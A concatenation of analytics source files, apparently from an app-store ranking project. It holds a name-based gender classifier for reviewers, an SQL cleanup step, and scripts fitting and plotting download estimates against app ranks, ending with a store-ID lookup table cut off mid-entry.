benchmark_df = benchmark_df.sort(['clean_name', 'is_male'], ascending=True)[['clean_name', 'is_male']].drop_duplicates()
surnames = [(n, 'name') for n in benchmark_df['clean_name']]
for n in surname_df['name']:
if n not in benchmark_df['clean_name']:
surnames.append((n, 'surname'))
random.shuffle(surnames)
surname_trainset_feat = [(features(n), g) for (n,g) in surnames]
surname_classifier = nltk.NaiveBayesClassifier.train(surname_trainset_feat)
print nltk.classify.accuracy(surname_classifier, surname_trainset_feat)
surname_classifier.show_most_informative_features(10)
names = [(n, 'female') for n in benchmark_df['clean_name'][benchmark_df['is_male']==0]]
names += [(n, 'male') for n in benchmark_df['clean_name'][benchmark_df['is_male']==1]]
random.shuffle(names)
gender_trainset_feat = [(features(n), g) for (n,g) in names]
gender_classifier = nltk.NaiveBayesClassifier.train(gender_trainset_feat)
print nltk.classify.accuracy(gender_classifier, gender_trainset_feat)
gender_classifier.show_most_informative_features(10)
query = 'SELECT reviewer FROM reviewer_p where p_language=%s and p_male<%s'
params = ('en', 0.0,)
CURSOR.execute(query, params)
rows=CURSOR.fetchall()
query = 'UPDATE reviewer_p SET p_male = %s WHERE reviewer=%s'
rx = re.compile('[\W\d_]')
for row in rows:
if row == None:
continue
if row[0]==None:
continue
p_male = get_male_probability(row[0], rx, gender_classifier, surname_classifier)
params = (p_male[0], row[0])
print CURSOR.mogrify(query, params)
CURSOR.execute(query, params)
CONN.commit()
if __name__ == '__main__':
main()
<file_sep>/int-vs-m-benchmark/sql/ios/1000f1-refine_application_data-drop_not_ranked_apps.sql
/*
FUNCTIONAL DESCRIPTION : Remove applications that are not ranked, final check before the actual estimation
DEPENDS ON TABLE(S) : temp.application_data, temp.rankings
RESULTS IN TABLE(S) : temp.application_data
PROCEDURE : STEP 1. Find all application that are not present in rankings
STEP 2. Remove those from temporary table temp.application_data
*/
-- STEP 1.
DROP TEMPORARY TABLE IF EXISTS temp.not_ranked_applications;
CREATE TEMPORARY TABLE temp.not_ranked_applications(
date date NOT NULL,
device_id TINYINT unsigned NOT NULL,
country_id smallint(5) unsigned NOT NULL,
type ENUM('paid','gross','free') NOT NULL,
application_id int(10) unsigned NOT NULL,
CONSTRAINT PRIMARY KEY (device_id,country_id, type, application_id)
)
AS
SELECT a.date, a.device_id,a.country_id,a.type,a.application_id
FROM temp.application_data a
LEFT JOIN temp.rankings r ON
r.date = a.date AND
r.device_id = a.device_id AND
r.country_id = a.country_id AND
r.type = a.type AND
r.application_id = a.application_id
WHERE r.application_id is null;
-- REMOVE NOT RANKED APPS FROM APPLICATION_DATA
-- STEP 2.
DELETE a.* FROM temp.application_data a
JOIN temp.not_ranked_applications r ON r.date = a.date AND
r.device_id = a.device_id AND
r.country_id = a.country_id AND
r.type = a.type AND
r.application_id = a.application_id
;
<file_sep>/datathon/early_adopters/README.MD
# Early Adopters

This directory contains the early-adopter project for the datathon.

## Plan
We have created a draft describing the plan:
https://docs.google.com/document/d/1sEcW82G0TdH20APacPo6EEiJuEUeLoy6Ks_zNkNthRw/edit

## Presentation
The presentation can be found here:
https://docs.google.com/presentation/d/1VTTCgGrHg2KyXkEILRTCqCqDYMLOfz_v_-ZK3l5OhCc/edit?ts=56055893
<file_sep>/ranking_change/find_clusters.py
'''
Created on Aug 30, 2013
@author: perezrafael
'''
import pandas as pd
import config
import operator
import scipy
import numpy as np
from numpy.linalg import norm
from scipy import spatial
from sklearn import cluster
import csv
from sklearn.svm import SVR
from sklearn.cross_validation import KFold
import matplotlib.pyplot as plt
from sklearn import linear_model
import statsmodels.api as sm
from scipy import optimize
import itertools
metadata_f = '/Users/perezrafael/appannie/data/2013-09-10_US_UK_JP_CN/debug_file_143441_6014+rsd+zvalue.csv'
iphone_ranks = pd.DataFrame({'Rank': np.arange(1, 1001)})
ipad_ranks = pd.DataFrame({'Rank': np.arange(1, 401)})
rank_range_limits = {20: [1, 20],
60: [21, 60],
200: [61, 200],
1000: [201, 1000]}
#pd.set_eng_float_format(accuracy=3, use_eng_prefix=True)
#pd.set_printoptions(precision = 3)
feed_type_format = {'IPHONE_FREE': 'Free',
'IPHONE_PAID': 'Paid',
'IPHONE_GROSSING': 'Grossing',
'IPAD_FREE': 'Free',
'IPAD_PAID': 'Paid',
'IPAD_GROSSING': 'Grossing',
}
feed_market_format = {'IPHONE_FREE': 'iPhone',
'IPHONE_PAID': 'iPhone',
'IPHONE_GROSSING': 'iPhone',
'IPAD_FREE': 'iPad',
'IPAD_PAID': 'iPad',
'IPAD_GROSSING': 'iPad',
}
min_IAP_from_subs = 0.0
grossing_business_models = {
'Pure Free': [operator.eq, 0.0, False, operator.eq, 0.0],
'Pure Paid': [operator.gt, 0.0, False, operator.eq, 0.0],
'Freemium': [operator.eq, 0.0, True, operator.le, min_IAP_from_subs],
'Paymium': [operator.gt, 0.0, True, operator.le, min_IAP_from_subs],
'Freemium + Subs': [operator.eq, 0.0, True, operator.gt, min_IAP_from_subs],
'Paymium + Subs': [operator.gt, 0.0, True, operator.gt, min_IAP_from_subs]
}
#### Data cleaning ######
def preprocess_metadata(df):
df['SS Country'] = df['APP Country'].apply(lambda x: config.IOS_STORES_DICT[x])
del df['APP Country']
df['SS Category'] = df['SS-APP Category-S'].apply(lambda x:config.IOS_CATEGORIES_DICT[x])
df['SS Type'] = df['SS-APP Feed-S'].apply(lambda x: feed_type_format[x])
df['SS Market'] = df['SS-APP Feed-S'].apply(lambda x: feed_market_format[x])
del df['SS-APP Feed-S']
df = df.fillna(0.0)
df['DATE-Week Day'] += 1
df.rename(columns={'DATE-Day': 'SS Date',
'AN-APP Actual-S': 'SS AN-APP Actual-S',
'INT-APP Estimate Weighted SBE-S': 'SS-APP Estimate Weighted SBE-S',
'AN-APP Actual Adj-C': 'SS Adjusted Actual',
'DATE-Week Day' : 'SS-DATE-Week Day'},
inplace=True)
matching = [s for s in df.columns if 'SS' in s]
df = df[matching]
df.rename(columns={'SS Country': 'Country',
'SS Category': 'Category',
'SS Type': 'Type',
'SS Market': 'Market',
'SS Date': 'Date',
'SS-Business Model-C': 'business_model',
'SS-APP ID-S': 'App ID',
'SS-APP Rank-S': 'Rank',
'SS-APP Estimate Weighted SBE-S': 'Estimate',
'SS Adjusted Actual': 'Adjusted Actual'},
inplace=True)
df['rank_range'] = 1000
#df['rank_range'][df['Rank']<50] = 50
#for rank in range(50,1600)[0::100]:
# df['rank_range'][(df['Rank']<rank) & (df['rank_range']==0)] = rank
df['rank_range'][df['Rank']<201] = 200
df['rank_range'][df['Rank']<61] = 60
df['rank_range'][df['Rank']<21] = 20
df = df.fillna(0.0)
return df
def train_models(df, algorithm):
def weightfunc(x):
df = pd.DataFrame(x[:,0])
df['r'] = 1.0/np.log(df[0])
df['r'][df[0]<=20] = 1.0
#df['r'][df[0]>200] = 0.05
return df['r'].values
#def fitfunc1(p, x):
# r = p[0]*(x[:,0]**p[1]) + p[2]*(x[:,1]**p[3])
#r = p[0]*(x[:,0]**p[1]) + p[2]*x[:,1]
#r = p[0]*x[:,0] + p[1]*x[:,1]
# return r
def fitfunc1(p, x):
r = p[0] * (x[:,0] ** p[1])
return r
def errfunc1(p, x, y):
r = fitfunc1(p, x) - y
return r
def errfunc2(p, x, y):
r = np.log((fitfunc1(p, x)**2.0)/(y**2.0)) * weightfunc(x)
return r
def errfunc3(p, x, y):
r = np.log((fitfunc1(p, x)**2.0)/(y**2.0))
return r
def errfunc4(p, x, y):
r = np.log((fitfunc1(p, x)**2.0)/(y**2.0)) / x[:,0]
return r
def errfunc5(p, x, y):
r = np.log((fitfunc1(p, x)**2.0)/(y**2.0)) / (x[:,0] * y)
return r
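    # Summary of the residual functions defined above, matching the plot labels:
    #   errfunc1: plain residual (est - actual)
    #   errfunc2: log(est^2 / actual^2), weighted by 1/log(rank) (1.0 for ranks <= 20)
    #   errfunc3: unweighted log(est^2 / actual^2)
    #   errfunc4: log(est^2 / actual^2) / rank
    #   errfunc5: log(est^2 / actual^2) / (rank * actual)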
training_features = [s for s in df.columns if "SS-5 Star Ratings Previous Week Cur Version-S" in s]
training_features.append('Rank')
result = []
df = df.sort(['Country', 'Category', 'Market', 'Type', 'rank_range'], ascending=False)
for n, g in df.groupby(['Country', 'Category', 'Market', 'Type', 'Date']):
model = None
train0 = g[g['SS-APP Universal-S']==False]
train0 = train0.set_index(np.arange(train0.shape[0]))
if n[2] == 'iPhone':
test = iphone_ranks.copy()
elif n[2] == 'iPad':
test = ipad_ranks.copy()
#test0 = test0[(test0['Rank']>=rank_range_limits[n[4]][0]) & (test0['Rank']<=rank_range_limits[n[4]][1])]
kf = KFold(len(train0), n_folds=5, indices=True)
if False:
try:
model = algorithm.fit(train[['Rank']], train['SS AN-APP Actual-S'])
g['only_rank_new_estimate'] = model.predict(g[['Rank']])
g['new_estimate'] = g['only_rank_new_estimate']
except:
pass
try:
model = algorithm.fit(train[training_features], train['SS AN-APP Actual-S'])
g['new_estimate'] = model.predict(g[training_features])
except:
pass
if False:
try:
glm = sm.GLM(train['SS AN-APP Actual-S'], train[['Rank']], family=sm.families.Gamma())
g['only_rank_new_estimate'] = glm.fit().predict(g[['Rank']])
g['new_estimate'] = g['only_rank_new_estimate']
except:
pass
try:
glm = sm.GLM(train['SS AN-APP Actual-S'], train[training_features], family=sm.families.Gamma())
g['new_estimate'] = glm.fit().predict(g[training_features])
except:
pass
#if True:
test_out = []
for tr, te in kf:
p0 = [1.0, 1.0, 1.0, 1.0]
train = train0.loc[tr]
#test = train0.loc[te]
if n[2] == 'iPhone':
test = iphone_ranks[iphone_ranks['Rank'].isin(train['Rank'])==False]
elif n[2] == 'iPad':
test = ipad_ranks[ipad_ranks['Rank'].isin(train['Rank'])==False]
try:
p1, success = optimize.leastsq(errfunc1, p0[:], args=(train[['Rank']].values, train['SS AN-APP Actual-S'].values), factor=0.1)
except Exception, e:
print n, 'new_estimate_1', e
test['new_estimate_1'] = fitfunc1(p1, test[['Rank']].values)
try:
p2, success = optimize.leastsq(errfunc2, p0[:], args=(train[['Rank']].values, train['SS AN-APP Actual-S'].values), factor=0.1)
except Exception, e:
print n, 'new_estimate_2', e
test['new_estimate_2'] = fitfunc1(p2, test[['Rank']].values)
try:
p3, success = optimize.leastsq(errfunc3, p0[:], args=(train[['Rank']].values, train['SS AN-APP Actual-S'].values), factor=0.1)
except Exception, e:
print n, 'new_estimate_3', e
test['new_estimate_3'] = fitfunc1(p3, test[['Rank']].values)
try:
p4, success = optimize.leastsq(errfunc4, p0[:], args=(train[['Rank']].values, train['SS AN-APP Actual-S'].values), factor=0.1)
except Exception, e:
print n, 'new_estimate_4', e
test['new_estimate_4'] = fitfunc1(p4, test[['Rank']].values)
try:
p5, success = optimize.leastsq(errfunc5, p0[:], args=(train[['Rank']].values, train['SS AN-APP Actual-S'].values), factor=0.1)
except Exception, e:
print n, 'new_estimate_5', e
test['new_estimate_5'] = fitfunc1(p5, test[['Rank']].values)
actuals_test = g.merge(test, on='Rank')
actuals_test = get_errors(actuals_test)
test_out.append(actuals_test)
test_out = pd.concat(test_out)
test_out = test_out.groupby(['Country', 'Category', 'Type', 'Date', 'App ID']).mean().reset_index()
test_out['Actual'] = test_out['Adjusted Actual']
plot_80_20(test_out)
g = g.merge(test_out, on='Rank', how='outer')
result.append(g)
result = pd.concat(result)
result['new_estimate_1'][result['new_estimate_1']<1.0] = 1.0
result['new_estimate_2'][result['new_estimate_2']<1.0] = 1.0
result['new_estimate_3'][result['new_estimate_3']<1.0] = 1.0
result['new_estimate_4'][result['new_estimate_4']<1.0] = 1.0
result['new_estimate_5'][result['new_estimate_5']<1.0] = 1.0
return result
def get_clusters(df):
result = []
total_dates = df['Date'].drop_duplicates().shape[0]
for n, g in df.groupby(['Country', 'Category', 'Market', 'Type', 'business_model']):
if g.shape[0]<total_dates:
continue
g = g.drop(['App ID'], axis=1)
corr = g.corr()
#corr = corr.loc[['SS AN-APP Actual-S']]
#del corr['SS AN-APP Actual-S']
corr['Country'] = n[0]
corr['Category'] = n[1]
corr['Type'] = n[2]
corr['business_model'] = n[3]
#corr['App ID'] = n[4]
corr = corr.fillna(0.0)
result.append(corr)
result = pd.concat(result)
result.to_csv('corr.csv', index=False)
for n, g in result.groupby(['Country', 'Category', 'Type', 'business_model']):
if g.shape[0] < 10:
continue
for column in g.columns:
if column in ['App ID', 'Country', 'Category', 'Type', 'business_model']:
continue
abs_mean = g[column].abs().mean()
if abs_mean < 0.0:
del g[column]
model = cluster.KMeans(n_clusters=3)
#model = cluster.DBSCAN(eps=0.5, min_samples=2, metric='chebyshev')
model.fit(g.drop(['App ID', 'Country', 'Category', 'Type', 'business_model'], axis=1).values)
g['Cluster'] = model.labels_
print n
#print g.columns
#print g[['Cluster']].groupby('Cluster').size()
print g.drop(['App ID', 'Country', 'Category', 'Type', 'business_model'], axis=1).abs().mean()
continue
for n2, g2 in g.groupby('Cluster'):
print n2, g2.shape[0]
print g2.drop(['App ID', 'Country', 'Category', 'Type', 'business_model'], axis=1).abs().mean()
def plot_actuals(df):
    ########### Plot actuals vs estimates ################
for n,g in df.groupby(['Country', 'Category', 'Type', 'Date']):
fig = plt.figure()
ax = fig.add_subplot(111)
p2, = ax.plot(g['Actual'], g['Estimate'], 'b.', alpha=0.4, label='Original SBE')
p3, = ax.plot(g['Actual'], g['new_estimate_1'], 'g.', alpha=0.4, label='est-actual')
p3, = ax.plot(g['Actual'], g['new_estimate_2'], 'c.', alpha=0.4, label='log(est^2/actual^2)*weight')
p3, = ax.plot(g['Actual'], g['new_estimate_3'], 'm.', alpha=0.4, label='log(est^2/actual^2)')
p3, = ax.plot(g['Actual'], g['new_estimate_4'], 'y.', alpha=0.4, label='log(est^2/actual^2)/rank')
p3, = ax.plot(g['Actual'], g['new_estimate_5'], 'k.', alpha=0.4, label='log(est^2/actual^2)/(rank*actual)')
p1, = ax.plot(g['Actual'], g['Actual'], 'r-', label='Actual')
ax.legend(loc='best', prop={'size':10})
title = 'difference_%s'%str(n)
plt.title(title)
plt.xlabel('Actual')
plt.ylabel('Estimate')
ax.set_yscale('log')
ax.set_xscale('log')
plt.grid()
fig.savefig('plots/new_model/%s.png'%title)
def plot_80_20(df):
########### Plot 80-20 curves ################
for n,g in df.groupby(['Country','Category', 'Type', 'Date']):
fig = plt.figure()
g = g.sort('Actual', ascending=False)
g = g[:200]
ax = fig.add_subplot(111)
y_values = (np.arange(g.shape[0])*1.0/g.shape[0])*100.0
g = g.sort('orig_rel_error', ascending=True)
p1, = ax.plot(g['orig_rel_error'], y_values, 'b-', linewidth=2.0, alpha=0.4, label='Original SBE')
g = g.sort('new_rel_error_1', ascending=True)
p2, = ax.plot(g['new_rel_error_1'], y_values, 'g-', linewidth=2.0, alpha=0.4, label='est-actual')
g = g.sort('new_rel_error_2', ascending=True)
p2, = ax.plot(g['new_rel_error_2'], y_values, 'c-', linewidth=2.0, alpha=0.4, label='log(est^2/actual^2)*weight')
g = g.sort('new_rel_error_3', ascending=True)
p3, = ax.plot(g['new_rel_error_3'], y_values, 'm-', linewidth=2.0, alpha=0.4, label='log(est^2/actual^2)')
g = g.sort('new_rel_error_4', ascending=True)
p3, = ax.plot(g['new_rel_error_4'], y_values, 'y-', linewidth=2.0, alpha=0.4, label='log(est^2/actual^2)/rank')
g = g.sort('new_rel_error_5', ascending=True)
p3, = ax.plot(g['new_rel_error_5'], y_values, 'k-', linewidth=2.0, alpha=0.4, label='log(est^2/actual^2)/(rank*actual)')
ax.legend(loc='best', prop={'size':10})
title = '80-20_%s'%str(n)
plt.title(title)
plt.xlim(0, 1.0)
plt.ylabel('%')
plt.xlabel('Relative Error')
plt.grid()
fig.savefig('plots/new_model/%s.png'%title)
def plot_ranks(df):
    ########### Plot estimates vs ranks ################
for n,g in df.groupby(['Country', 'Category', 'Market', 'Type', 'Date']):
fig = plt.figure()
ax = fig.add_subplot(111)
p2, = ax.plot(g['Rank'], g['Estimate'], 'b.', alpha=0.4, label='Original SBE')
p3, = ax.plot(g['Rank'], g['new_estimate_1'], 'g.', alpha=0.4, label='est-actual')
p3, = ax.plot(g['Rank'], g['new_estimate_2'], 'c.', alpha=0.4, label='log(est^2/actual^2)*weight')
p3, = ax.plot(g['Rank'], g['new_estimate_3'], 'm.', alpha=0.4, label='log(est^2/actual^2)')
p3, = ax.plot(g['Rank'], g['new_estimate_4'], 'y.', alpha=0.4, label='log(est^2/actual^2)/rank')
p3, = ax.plot(g['Rank'], g['new_estimate_5'], 'k.', alpha=0.4, label='log(est^2/actual^2)/(rank*actual)')
p1, = ax.plot(g['Rank'][g['SS-APP Universal-S']==False], g['Adjusted Actual'][g['SS-APP Universal-S']==False], 'r.', label='Non-universal Actual')
ax.legend(loc='best', prop={'size':10})
title = 'ranks_%s'%str(n)
plt.title(title)
plt.xlabel('Rank')
plt.ylabel('Estimate')
ax.set_yscale('log')
ax.set_xscale('log')
plt.grid()
fig.savefig('plots/new_model/%s.png'%title)
def get_errors(df):
df = df.groupby(['Country', 'Category', 'Type', 'App ID', 'Date']).sum().reset_index()
df['orig_rel_error'] = (df['Estimate'] - df['Adjusted Actual']).abs()/df['Adjusted Actual']
df['new_rel_error_1'] = (df['new_estimate_1'] - df['Adjusted Actual']).abs()/df['Adjusted Actual']
df['new_rel_error_2'] = (df['new_estimate_2'] - df['Adjusted Actual']).abs()/df['Adjusted Actual']
df['new_rel_error_3'] = (df['new_estimate_3'] - df['Adjusted Actual']).abs()/df['Adjusted Actual']
df['new_rel_error_4'] = (df['new_estimate_4'] - df['Adjusted Actual']).abs()/df['Adjusted Actual']
df['new_rel_error_5'] = (df['new_estimate_5'] - df['Adjusted Actual']).abs()/df['Adjusted Actual']
return df
def analyze_ratings(df):
def fitfunc1(p, x):
r = (x[:,0]*p[0] +
x[:,1]*p[1] +
x[:,2]*p[2] +
x[:,3]*p[3] +
x[:,4]*p[4] +
x[:,5]*p[5] +
x[:,6]*p[6] +
x[:,7]*p[7] +
x[:,8]*p[8] +
x[:,9]*p[9] +
x[:,10]*p[10] +
x[:,11]*p[11] +
x[:,12]*p[12] +
x[:,13]*p[13] +
x[:,14]*p[14] +
x[:,15]*p[15] +
x[:,16]*p[16]
)
return r
def errfunc1(p, x, y):
r = fitfunc1(p, x) - y
return r
df.sort(['Country', 'Category', 'Type', 'Market', 'Date'], inplace=True)
df.drop_duplicates(cols=['Country', 'Type', 'App ID', 'Date'], inplace=True)
df['SS-5 Star Ratings Previous Week All Version-S'] = df['SS-5 Star Ratings Previous Week All Version-S'].fillna(0.0)
df['SS-4 Star Ratings Previous Week All Version-S'] = df['SS-4 Star Ratings Previous Week All Version-S'].fillna(0.0)
df['SS-3 Star Ratings Previous Week All Version-S'] = df['SS-3 Star Ratings Previous Week All Version-S'].fillna(0.0)
df['SS-2 Star Ratings Previous Week All Version-S'] = df['SS-2 Star Ratings Previous Week All Version-S'].fillna(0.0)
df['SS-1 Star Ratings Previous Week All Version-S'] = df['SS-1 Star Ratings Previous Week All Version-S'].fillna(0.0)
df['Delta-SS-5 Star Ratings Previous Week All Version-S'] = (df['SS-5 Star Ratings Previous Week All Version-S'].shift() - df['SS-5 Star Ratings Previous Week All Version-S'])*1.0/df['SS-5 Star Ratings Previous Week All Version-S']
df['Delta-SS-4 Star Ratings Previous Week All Version-S'] = (df['SS-4 Star Ratings Previous Week All Version-S'].shift() - df['SS-4 Star Ratings Previous Week All Version-S'])*1.0/df['SS-4 Star Ratings Previous Week All Version-S']
df['Delta-SS-3 Star Ratings Previous Week All Version-S'] = (df['SS-3 Star Ratings Previous Week All Version-S'].shift() - df['SS-3 Star Ratings Previous Week All Version-S'])*1.0/df['SS-3 Star Ratings Previous Week All Version-S']
df['Delta-SS-2 Star Ratings Previous Week All Version-S'] = (df['SS-2 Star Ratings Previous Week All Version-S'].shift() - df['SS-2 Star Ratings Previous Week All Version-S'])*1.0/df['SS-2 Star Ratings Previous Week All Version-S']
df['Delta-SS-1 Star Ratings Previous Week All Version-S'] = (df['SS-1 Star Ratings Previous Week All Version-S'].shift() - df['SS-1 Star Ratings Previous Week All Version-S'])*1.0/df['SS-1 Star Ratings Previous Week All Version-S']
df['%-SS-5 Star Ratings Previous Week All Version-S'] = df['SS-5 Star Ratings Previous Week All Version-S'] / df['SS-APP Ratings Prv Week All Version-S']
df['%-SS-4 Star Ratings Previous Week All Version-S'] = df['SS-4 Star Ratings Previous Week All Version-S'] / df['SS-APP Ratings Prv Week All Version-S']
df['%-SS-3 Star Ratings Previous Week All Version-S'] = df['SS-3 Star Ratings Previous Week All Version-S'] / df['SS-APP Ratings Prv Week All Version-S']
df['%-SS-2 Star Ratings Previous Week All Version-S'] = df['SS-2 Star Ratings Previous Week All Version-S'] / df['SS-APP Ratings Prv Week All Version-S']
df['%-SS-1 Star Ratings Previous Week All Version-S'] = df['SS-1 Star Ratings Previous Week All Version-S'] / df['SS-APP Ratings Prv Week All Version-S']
df['SS-5 Star Ratings Previous Week Prev Version-S'] = df['SS-5 Star Ratings Previous Week All Version-S'] - df['SS-5 Star Ratings Previous Week Cur Version-S']
df['SS-4 Star Ratings Previous Week Prev Version-S'] = df['SS-4 Star Ratings Previous Week All Version-S'] - df['SS-4 Star Ratings Previous Week Cur Version-S']
df['SS-3 Star Ratings Previous Week Prev Version-S'] = df['SS-3 Star Ratings Previous Week All Version-S'] - df['SS-3 Star Ratings Previous Week Cur Version-S']
df['SS-2 Star Ratings Previous Week Prev Version-S'] = df['SS-2 Star Ratings Previous Week All Version-S'] - df['SS-2 Star Ratings Previous Week Cur Version-S']
df['SS-1 Star Ratings Previous Week Prev Version-S'] = df['SS-1 Star Ratings Previous Week All Version-S'] - df['SS-1 Star Ratings Previous Week Cur Version-S']
df['isSun'] = 0.0
df['isMon'] = 0.0
df['isTue'] = 0.0
df['isWed'] = 0.0
df['isThu'] = 0.0
df['isFri'] = 0.0
df['isSat'] = 0.0
df['isSun'][df['SS-DATE-Week Day']==1] = 1.0
df['isMon'][df['SS-DATE-Week Day']==2] = 1.0
df['isTue'][df['SS-DATE-Week Day']==3] = 1.0
df['isWed'][df['SS-DATE-Week Day']==4] = 1.0
df['isThu'][df['SS-DATE-Week Day']==5] = 1.0
df['isFri'][df['SS-DATE-Week Day']==6] = 1.0
df['isSat'][df['SS-DATE-Week Day']==7] = 1.0
p0 = [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]
independent_variables = ['SS-5 Star Ratings Previous Week Prev Version-S',
'SS-4 Star Ratings Previous Week Prev Version-S',
'SS-3 Star Ratings Previous Week Prev Version-S',
'SS-2 Star Ratings Previous Week Prev Version-S',
'SS-1 Star Ratings Previous Week Prev Version-S',
'SS-5 Star Ratings Previous Week Cur Version-S',
'SS-4 Star Ratings Previous Week Cur Version-S',
'SS-3 Star Ratings Previous Week Cur Version-S',
'SS-2 Star Ratings Previous Week Cur Version-S',
'SS-1 Star Ratings Previous Week Cur Version-S',
'isSun',
'isMon',
'isTue',
'isWed',
'isThu',
'isFri',
'isSat',
]
all_variables = list(independent_variables)
all_variables.append('SS AN-APP Actual-S')
print all_variables
df = df[df['Type']=='Free'].reset_index()
kf = KFold(len(df), n_folds=5, indices=True, shuffle=True)
result = []
for tr, te in kf:
train = df.loc[tr]
test = df.loc[te]
#train = df[df['Date']<'2013-08-03']
#test = df[df['Date']=='2013-08-03']
train = train.dropna(subset=all_variables)
test = test.dropna(subset=independent_variables)
#print train[all_variables].describe()
p1, success = optimize.leastsq(errfunc1, p0[:], args=(train[independent_variables].values,
train['SS AN-APP Actual-S'].values))
test['new_estimate_1'] = (fitfunc1(p1, test[independent_variables].values))
print p1
result.append(test)
if False:
#for n, g in df.groupby('App ID'):
fig = plt.figure()
ax = fig.add_subplot(111)
#print df[['Date', 'App ID', 'SS-5 Star Ratings Previous Week All Version-S', 'Delta-SS-5 Star Ratings Previous Week All Version-S']]
#plt.plot(df['SS-APP Avg Rating Alltime Cur Version-S'], np.log(df['SS AN-APP Actual-S']), '.', alpha=0.4, label='Avg')
f = train
plot_y = 'SS AN-APP Actual-S'
plt.plot(f['SS-5 Star Ratings Previous Week Cur Version-S'], f[plot_y], '.', alpha=0.4, label='5 stars')
plt.plot(f['SS-4 Star Ratings Previous Week Cur Version-S'], f[plot_y], '.', alpha=0.4, label='4 stars')
plt.plot(f['SS-3 Star Ratings Previous Week Cur Version-S'], f[plot_y], '.', alpha=0.4, label='3 stars')
plt.plot(f['SS-2 Star Ratings Previous Week Cur Version-S'], f[plot_y], '.', alpha=0.4, label='2 stars')
plt.plot(f['SS-1 Star Ratings Previous Week Cur Version-S'], f[plot_y], '.', alpha=0.4, label='1 star')
#plt.plot(f['SS-APP Ratings Prv Week All Version-S'], f[plot_y], '.', alpha=0.4, label='All Star B')
ax.legend(loc='best', prop={'size':10})
ax.set_yscale('log')
ax.set_xscale('log')
#plt.ylim([0, 20000])
plt.ylabel('Actual')
plt.xlabel('Ratings Count')
plt.show()
#plt.savefig('ratings.png')
result = pd.concat(result)
result['abs_error'] = (result['new_estimate_1'] - result['SS AN-APP Actual-S']).abs()
result['rel_error'] = result['abs_error'] / result['SS AN-APP Actual-S']
result.sort(['Date', 'SS AN-APP Actual-S'], ascending=[1, 0], inplace=True)
result[[
'SS AN-APP Actual-S',
'new_estimate_1',
'rel_error',
'abs_error',
'App ID',
'Date',
'%-SS-5 Star Ratings Previous Week All Version-S',
'%-SS-4 Star Ratings Previous Week All Version-S',
'%-SS-3 Star Ratings Previous Week All Version-S',
'%-SS-2 Star Ratings Previous Week All Version-S',
'%-SS-1 Star Ratings Previous Week All Version-S',
'SS-5 Star Ratings Previous Week All Version-S',
'SS-4 Star Ratings Previous Week All Version-S',
'SS-3 Star Ratings Previous Week All Version-S',
'SS-2 Star Ratings Previous Week All Version-S',
'SS-1 Star Ratings Previous Week All Version-S']].to_csv('test_ratings.csv', index=False)
for n, g in result.groupby('Date'):
g.sort('SS AN-APP Actual-S', ascending=False, inplace=True)
print n, g['rel_error'][:20].mean(), g['rel_error'][21:200].mean(), g['rel_error'][201:10000].mean(), g['abs_error'][:20].mean(), g['abs_error'][21:200].mean(), g['abs_error'][201:10000].mean()
fig = plt.figure()
ax = fig.add_subplot(111)
plot_y = 'SS AN-APP Actual-S'
plt.plot(g[plot_y], g['new_estimate_1'], 'b.', alpha=0.4, label='Prediction')
plt.plot(g[plot_y], g[plot_y], 'r-', alpha=1.0, label='Actual')
ax.legend(loc='best', prop={'size':10})
ax.set_yscale('log')
ax.set_xscale('log')
#plt.ylim([0, 20000])
plt.title(n)
plt.ylabel('Prediction')
plt.xlabel('Actual')
plt.savefig('%s.png'%n)
#plt.show()
return
def main():
df = preprocess_metadata(pd.read_csv(metadata_f))
df = df[df['Date']>='2013-07-28']
df = df[df['Date']<='2013-08-03']
df = df[df['Country']=='United States']
#df = df[df['Rank']>200]
#df = df[df['Type']=='Grossing']
#df = df[df['Category']=='Games']
#df = df[df['SS-APP Universal-S']==False]
print df['Date'].min()
print df['Date'].max()
#df = df[df['Rank']<=20]
analyze_ratings(df)
return
#plt.plot(df['SS-5 Star Ratings Previous Week Cur Version-S'], df['Rank'], 'r.', alpha=0.4)
#plt.show()
#return
#get_clusters(df)
#return
#df = df[(df['Date']=='2013-07-28') | (df['Date']=='2013-08-03')]
algorithm = SVR(kernel='rbf', C=1e3, gamma=0.1)
#algorithm = linear_model.LinearRegression()
df = train_models(df, algorithm)
plot_ranks(df)
df = get_errors(df)
df['Actual'] = df['Adjusted Actual']
#plot_actuals(df)
#plot_80_20(df)
if __name__ == '__main__':
main()<file_sep>/google-analytics/__init__.py
## This is Google Analytics Benchmarking Version v1.0
<file_sep>/old_investigations/internal/stores_dict.py
"""
Translate numeric store IDs (category, market, type, units type, country) to names.
"""
category_dict = {36: u'Overall', 6000: u'Business', 6001: u'Weather',
6002: u'Utilities', 6003: u'Travel', 6004: u'Sports',
6005: u'Social Networking', 6006: u'Reference', 6007: u'Productivity',
6008: u'Photo and Video', 6009: u'News', 6010: u'Navigation',
6011: u'Music', 6012: u'Lifestyle', 6013: u'Health and Fitness',
6014: u'Games', 6015: u'Finance', 6016: u'Entertainment',
6017: u'Education', 6018: u'Books', 6020: u'Medical',
6021: u'Newsstand', 6022: u'Catalogs', 6023: u'Food and Drink',
7001: u'Action', 7002: u'Adventure', 7003: u'Arcade',
7004: u'Board', 7005: u'Card', 7006: u'Casino',
7007: u'Dice', 7008: u'Educational', 7009: u'Family',
7010: u'Kids', 7011: u'Music', 7012: u'Puzzle',
7013: u'Racing', 7014: u'Role Playing', 7015: u'Simulation',
7016: u'Sports', 7017: u'Strategy', 7018: u'Trivia', 7019: u'Word'}
market_dict = {0: "IPHONE", 1: "IPHONE", 2: "IPHONE",
100: "IPAD", 101: "IPAD", 102: "IPAD"}
type_dict = {0: "FREE", 1: "PAID", 2: "GROSSING",
100: "PAID", 101: "FREE", 102: "GROSSING"}
units_type_dict = {0: "Downloads", 1: "Downloads", 2: "USD",
100: "Downloads", 101: "Downloads", 102: "USD"}
country_dict = {143441: u'United States', 143442: u'France', 143443: u'Germany',
143444: u'United Kingdom', 143445: u'Austria', 143446: u'Belgium',
143447: u'Finland', 143448: u'Greece', 143449: u'Ireland',
143450: u'Italy', 143451: u'Luxembourg', 143452: u'Netherlands',
143453: u'Portugal', 143454: u'Spain', 143455: u'Canada',
143456: u'Sweden', 143457: u'Norway', 143458: u'Denmark',
143459: u'Switzerland', 143460: u'Australia', 143461: u'New Zealand',
143462: u'Japan', 143463: u'Hong Kong', 143464: u'Singapore',
143465: u'China', 143466: u'South Korea', 143467: u'India',
143468: u'Mexico', 143469: u'Russia', 143470: u'Taiwan',
